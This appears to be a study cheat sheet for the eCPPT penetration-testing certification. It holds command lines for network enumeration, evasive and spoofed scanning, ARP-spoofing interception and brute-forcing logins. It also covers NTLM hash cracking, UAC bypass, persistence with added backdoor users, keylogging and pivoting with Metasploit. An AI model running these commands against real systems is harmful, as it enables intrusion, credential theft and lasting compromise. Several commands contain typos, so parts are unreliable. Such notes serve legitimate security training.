eCPPT NETWORK SECURITY | |
*DNS Enumeration | |
nslookup example.com | |
nslookup -query=mx domain | |
nslookup -query=ns domain | |
nslookup -query=any domain | |
interactive mode { | |
set q=ns domain | |
set q=mx domain | |
set q=cname domain | |
} | |
dig domain | |
dig domain A | |
dig domain NS | |
dig +nocmd domain MX +noall +answer | |
dig +nocmd domain MX +noall +answer | |
dig +nocmd domain AXFR +noall +answer @vulnDNS | |
fierce -dns domain | |
fierce -dns domain -dnsserver vuln.DNS | |
dnsenum domain | |
dnsenum domain --dnsserver vuln.DNS | |
dnsenum domain -f host.list | |
dnsmap domain | |
dnsrecon -d domain | |
*NETBIOS | |
windows commands | |
nbtstat -A $IP | |
net view $IP | |
net use /? | |
net use \\resource\path | |
** net bios auditing tool ** | |
nat.exe -u userlist -p passwordlist $IP | |
winfingerprint GUI tool | |
NULLSESSION | |
net use \\source\ipc$ "" /user:" | |
SID2USER (replace - with " " ) | |
sid2user.exe \\source $SID | |
sid2user.exe \\source $SID 500 (admin) | |
sid2user.exe \\source $SID 501 (guest) | |
sid2user.exe \\source $SID 1000 (account created by user) | |
dumpsec GUI tool | |
linux commands | |
*polenum | |
*ldapscripts | |
enum4linux -a -v $IP | |
smbclient -L $IP | |
smbclient \\\\$IP\\folderToAccess | |
*SNMP Enumeration | |
snmpwalk -h | |
snmpwalk -v -2c -c public $IP | |
snmpwalk -v -2c -c public $IP hrSWInstalledName | |
snmpwalk -v -2c -c public $IP hrMemorySize | |
snmpwalk -v -2c -c public $IP sysContact | |
snmpset -v -2c -c public $IP sysContant.0 s value | |
nmap -sU -p 161 --script snmp-win32-service $IP | |
nmap -SU -p 161 --script snmp-brute $IP | |
nmap -SU -p 161 --script snmp-win32-users $IP | |
SCANNING | |
*Idle Hping & nmap command | |
hping3 -S -r $IP -p 135 # syn scan | |
if the target responds with IP ID +1, it is a good zombie candidate; in general the IP ID must be incremental | |
hping3 -a $ZIP -S $VIP -p 23 #spoof IP | |
zip = zombie, vip = victim; if the zombie's IP ID increases by +2, port 23 is open | |
nmap --script ipdseq $IP -p 135 | |
checks whether the IP ID is incremental | |
nmap -O -v $IP -p 135 | |
nmap -sI $zip:135 $vip -p 23 --packet-trace | |
zombie idle scan (-sI) | |
hping3 -S -r $vip -p 135 + | |
nmap -S $zip $vip -p 23 -Pn -e eth0 -n --disable-arp-ping | |
if the zombie responds with an incremented IP ID then the port is open | |
*NMAP scan and NSE scripting | |
nmap --script-help "smb" and discovery | |
how to search for nse scripts | |
nmap --script auth $IP | |
runs all auth nse scripts | |
nmap --script default $IP | |
nmap -f $vip -n -p80 --disable-arp-ping -Pn | |
nmap -f -sS $vip -p 80 -Pn -n --disable-arp-ping --data-length 100 | |
nmap -f -sS $vip -p 80 -Pn -n --disable-arp-ping --data-length 48 | |
every fragment is 8 bytes | |
nmap -f -f -sS $vip -p 80 -Pn -n --disable-arp-ping | |
(every fragment is 16 bytes) | |
*Using Decoys (popular idle scans) | |
nmap -p 80 -D $dec1,ME,dec2 $vip | |
nmap -D RND:10 $vip -sS -p 80 -Pn --disable-arp-ping | |
hping3 --rand-source -S -p 80 $vip -c 3 | |
hping3 -a $spoofIP -S -p 80 $vip | |
nmap --source-port 53 $vip -sS | |
DNS source port is often allowed through firewalls | |
hping3 -S -s 53 --scan known $vip | |
nmap -sS --data-lenght 10 -p 21 $vip | |
hping3 -S -p 21 --data 24 $vip | |
nmap --spoof-mac apple $vip -p 80 -Pn --disable-arp-ping -n | |
nmap --spoof-mac 0 $vip -p 80 -Pn --disable-arp-ping -n | |
nmap --spoof-mac 00:11:22:33:44:55 $vip -p 80 -Pn --disable-arp-ping -n | |
nmap -iL host.list -sS -p80,443,5555,21,22 --randomize-hosts | |
nmap -iL host.list -sS -p80,443,5555,21,22 --randomize-hosts -T2 | |
hping3 -1 --rand-dest 192.168.1.x -I eth0 | |
hping3 --scan 80,443,21,22 $vip -i u10 | |
Man In The Middle ATTACKS | |
*SNIFFING TRAFFIC | |
tcpdump --help | |
tcpdump -D // list interfaces | |
tcpdump -i eth0 | |
tcpdump -i eth0 -v | |
tcpdump -i eth0 -n //disable dns resolution | |
tcpdump -i eth0 -q //quiet option | |
tcpdump -i eth0 host $IP //sniff a specific host or IP | |
tcpdump -i eth0 src $sourceaddr dst $destinaddr | |
tcpdump -i eth0 -F filter.file //file that contains the filter expression [port No] | |
tcpdump -i eth0 -c 150 //packets we want to capture | |
tcpdump -i eth0 -w output_file.txt //save output | |
tcpdump -i eth0 -r output_file.txt //read output | |
tcpdump -i eth0 | grep $IP | |
*MITM | |
Promiscuous mode allows the network interface card to accept and process all packets it receives | |
A switch forwards traffic only to the intended destination | |
ettercap | |
bettercap | |
mitmf | |
sslstrip | |
//enable IP forwarding | |
echo 1 > /proc/sys/net/ipv4/ip_forward | |
//arp spoofing [2 way] [ | |
arpsoof -i eth0 -t $targetIP $impersonateIP | |
arpsoof -i eth0 -t $impersonateIP $targetIP | |
] | |
dsniff -i eth0 //grabs basic auth credentials | |
bettercap -h | |
bettercap -I eth0 -X -G $target1 -T $target2ip //sniffing mode | |
EXPLOITATION | |
*Auth Bruteforce | |
ncrack -vv -U userlist -P passlist 192.168.1.1 -p @telnet | |
medusa -h 192.168.1.1 -M ssh -U userlist -P passlist | |
hydra -L userlist -P passlist ssh://192.168.1.1 | |
hydra -L userlist -P passlist ssh://192.168.1.1 -T 50 | |
patator ftp_login -help | |
patator ftp_login host=192.168.1.1 user=FILE0 password=FILE1 0=userlist 1=passlist -x ingonre:msg="Login incorrect" | |
patator ssh_login host=192.168.1.1 user="test" password="test" | |
patator ssh_login host=192.168.1.1 user=FILE0 password=FILE1 0=userlist 1=passlist -x ingonre:msg="Filter To Use" | |
patator telnet_login inputs="FILE0\nFILE1\n" host= 192.168.1.1 0=userlist 1=passlist -x ingonre:msg="Filter To Use" | |
*LM_NTLM crack | |
use auxilirary/server/capture/smb | |
set JOHNPWFILE hashes | |
rcracki_mt -h 8818c6a2a95684g4 -t 4 *.rti // needs a rainbow table file; 8 bytes of the LM hash (16 hex chars); -t => threads | |
netntlm --file /file/challenge_response --seed passdiscovered // recovers (if cracked) the password | |
netntlm --file /file/challenge_response --seed fullpass // case sensitive | |
POST EXPLOITATION | |
*Privileges Escalation on Windows | |
> sysinfo | |
> getprivs // list session privileges | |
> run post/windows/gather/win_privs // list all machine privileges and UAC status | |
use epxloit/windows/local/bypassuac_injection // try to bypass the UAC | |
- exploit suggester | |
//external tools | |
UACme | |
*Privileges Escalation on Linux | |
sysinfo | |
- exploit suggester | |
> execute -f /bin/sh -i -c // create a new channel and interacts with it | |
*Maintaining Access & persistence | |
(inside meterpreter) | |
- migration to another service | |
- hashdump OR post /windows/gather/smart_hashdump | |
- psexec | |
Adding new user to remote system | |
- run getgui -e -u user -p pass //adding new user via RDP and enabled (connect via [ xfreerdp /v:$IP /u:$user /p:$pass | |
- exploit/windows/local/persistence | |
*Pillaging | |
shell > systeminfo | |
mptr > post/windows/gather/* | |
> search -f *.kdb -r -d //searching for specific info | |
> post/windows/capture/* //keylogger | |
shell > ipconfig /all | |
# > route OR+AND arp | |
# > netstat -ano | |
# > wmic ? | |
# > wmic service /? | |
# > wmic service get [caption,started] | |
# > wmic service where started=true get caption | |
*Mapping Internal network | |
shell > ipconfig /all | |
mtrp > arp & route | |
shell > ipconfig /displaydns | |
# > netstat -ano | |
# > netstat -b | |
msf > post/multi/gather/ping_sweep | |
mtpr > run arp_scan -r $IP/* | |
msf > post/windows/manage/autoroute // adding route so can scan internal network | |
# > auxiliary/server/socks4a // configure a SOCKS proxy (edit proxychains config) | |
mtpr > portfwd add -l 8080 -p 80 -r $Remote IP // l = local port , p = remote port , r = remote host |